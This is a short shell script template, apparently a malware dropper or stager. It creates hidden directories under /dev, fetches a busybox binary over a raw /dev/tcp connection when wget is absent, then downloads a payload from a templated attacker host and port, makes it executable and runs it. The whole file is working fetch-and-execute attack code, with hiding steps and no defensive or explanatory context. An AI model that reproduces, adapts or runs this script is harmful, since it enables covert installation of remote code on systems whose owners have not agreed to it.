#!/bin/sh
export PATH="$PATH:/usr/local/sbin:/usr/local/bin:/usr/bin:/bin:/sbin"

mkdir -p /dev/.sprrw

if ! [ $(command -v wget) ]; then
  mkdir -p /dev/.sprrw.bin
  bash -c "exec 3<>/dev/tcp/{{.Host}}/{{.Port}}; echo BSH bb>&3; cat <&3" > /dev/.sprrw.bin/busybox
  chmod +x /dev/.sprrw.bin/busybox
  ln -s /dev/.sprrw.bin/busybox /dev/.sprrw.bin/wget
  export PATH="$PATH:/dev/.sprrw.bin"
fi

wget -O /dev/.sprrw/{{.Name}} {{.Protocol}}://{{.Host}}:{{.Port}}/{{.Name}}

chmod +x /dev/.sprrw/{{.Name}}

/dev/.sprrw/{{.Name}}
